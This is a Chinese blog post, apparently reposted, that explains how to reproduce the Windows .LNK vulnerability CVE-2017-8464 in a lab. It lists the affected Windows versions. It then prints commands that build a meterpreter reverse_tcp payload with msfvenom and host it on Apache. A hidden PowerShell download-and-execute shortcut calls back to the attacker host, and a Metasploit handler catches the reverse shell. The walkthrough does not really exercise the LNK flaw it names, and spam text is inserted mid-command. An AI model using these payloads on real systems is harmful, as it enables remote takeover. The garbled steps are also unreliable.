如何实现远程命令执行漏洞CVE-2017-8464复现


这期内容当中小编将会给大家带来有关如何实现远程命令执行漏洞CVE-2017-8464复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。注:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 for 32-bit SystemsMicrosoft Windows 10 for x64-based SystemsMicrosoft Windows 10 version 1511 for 32-bit SystemsMicrosoft Windows 10 version 1511 for x64-based SystemsMicrosoft Windows 10 version 1703 for 32-bit SystemsMicrosoft Windows 10 version 1703 for x64-based SystemsMicrosoft Windows 7 for 32-bit Systems SP1Microsoft Windows 7 for x64-based Systems SP1Microsoft Windows 8.1 for 32-bit SystemsMicrosoft Windows 8.1 for x64-based SystemsMicrosoft Windows RT 8.1Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1Microsoft Windows Server 2008 R2 for x64-based Systems SP1Microsoft Windows Server 2008 for 32-bit Systems SP2Microsoft Windows Server 2008 for Itanium-based Systems SP2Microsoft Windows Server 2008 for x64-based Systems SP2Microsoft Windows Server 2012Microsoft Windows Server 2012 R2Microsoft Windows Server 2016受害机:windows2008R2攻击机:kali1. 在msdn下载存在漏洞版本系统镜像,使用VMware虚拟机安装镜像Madn下载地址:https://msdn.itellyou.cn/
2.下载完成后使用VMware安装虚拟机。注:安装方法最新百度
1.打开kali,使用kali下的msfvenom生成一个ps1的shellmsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.6 lport=9999 -f psh-reflection>/root/test/shell.ps12.将生成的shell.ps1复制到/var/www/html目录下,然后开启apache服务,在浏览器访问shell.ps1文件可直接访问cp shell.ps1 /var/www/htnlservice apache2 start

3.在受害机上在在桌面右键创建一个powersehll远程快捷方式,命令为powershell.exepowershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).Download免费云主机域名String(‘http://192.168.3.6/shell.ps1’);test.ps1″

4.在kali使用msf配置监听模块,并运行use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpshow optionsset LHOST xxx.xxx.xx.xset lport 9999run
5.配置完成并运行了之后,在受害机运行刚刚创建的powershell文件,可以看到kali反弹了shell
1.建议安装官方补丁2.安装防护软件上述就是小编为大家分享的如何实现远程命令执行漏洞CVE-2017-8464复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注云编程开发博客行业资讯频道。

相关推荐: ping不通服务器怎么办

这篇文章主要介绍“ping不通服务器怎么办”,在日常操作中,相信很多人在ping不通服务器怎么办问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”ping不通服务器怎么办”的疑惑有所帮助!接下来,请跟免费云主机域名着小编一起来学习吧…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/05 11:58
Next 02/05 11:58